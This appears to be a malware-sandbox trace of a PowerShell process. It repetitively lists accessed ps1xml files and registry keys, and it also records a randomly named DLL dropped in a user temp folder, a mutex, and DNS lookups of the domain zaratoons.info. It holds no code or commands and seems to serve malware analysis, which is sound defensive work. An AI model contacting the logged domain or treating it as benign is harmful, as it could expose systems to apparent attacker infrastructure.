windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
c:\
c:\users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
dll
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
DNSRecord
zaratoons.info
File
conout$
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
windows\microsoft.net\framework64\v2.0.50727\config\machine.config
c:\
c:\windows\microsoft.net\framework64\v2.0.50727\config\machine.config
config
File
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
c:\
c:\users\5p5nrgjn0js halpmcxz\appdata\local\temp\vthqexnegi.dll
dll
File
STD_INPUT_HANDLE
Mutex
Global\.net clr networking
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
WinRegistryKey
Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE
InstallationType
InstallationType
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE
Library
Library
IsMultiInstance
IsMultiInstance
First Counter
First Counter
WinRegistryKey
SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE
CategoryOptions
CategoryOptions
FileMappingSize
FileMappingSize
Counter Names
WinRegistryKey
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_CURRENT_USER
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
HKEY_LOCAL_MACHINE
WinRegistryKey
SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings
HKEY_LOCAL_MACHINE
DNSRecord
zaratoons.info
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
File
conout$
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
File
conout$
File
conout$
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
